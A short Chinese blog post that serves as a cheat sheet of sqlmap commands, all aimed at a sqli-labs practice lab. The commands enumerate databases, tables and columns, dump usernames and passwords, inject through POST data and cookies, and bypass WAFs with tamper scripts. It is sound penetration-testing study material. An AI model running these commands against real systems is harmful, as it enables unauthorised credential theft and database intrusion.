sqlmap使用总结
2018-12-29 本文已影响3人
原来是老王
sqlmap是全面的注入工具
最简单形式
#Get
python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-1/?id=1" --batch
#爆数据库
python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-1/?id=1" --dbs
#爆表名
python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-1/?id=1" -D security --tables
#爆列名
python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-1/?id=1" -D security -T users --columns
#dump数据
python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-1/?id=1" -D security -T users -C id,username,password --dump
post,cookies
python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-11/" --data="uname=admin&passwd=admin&submit=Submit" --cookie="XIc6_2132_saltkey=g5N5rRBz; SESS2a7db910cd5249ca3016afc519d2d9bf=OFwfZCCwgO8XF5bYygJsUNy__-kwXuDVk2birG42BVA" --batch
从文件中读取
最好用,(可以burpsuite抓包,保存到文件中如:in.txt)
python27 sqlmap.py -r in.txt --batch
指定参数
指定存在漏洞的参数,适合猜测或者手动分析过
python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-11/" --data="uname=admin&passwd=admin&submit=Submit" -p passwd --batch
指定注入的方式
适合手动测试过,特别是sqlmap会优先用time-based而不是union select
python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-1/?id=1" --technique U --batch --dbs
#B, E, Q, S, T, U
指定注入位置
“ * “号指定注入的指定位置
python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-1/?id=1*+--+" --batch
tamper绕过waf
tamper绕过waf,可以尝试使用不同的tamper来绕过waf,保存在tamper目录下
python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-1/?id=1" --tamper=space2comment --batch
其他参数
可以直接sqlmap -h 或者 sqlmap -hh查看下,有需要可以尝试下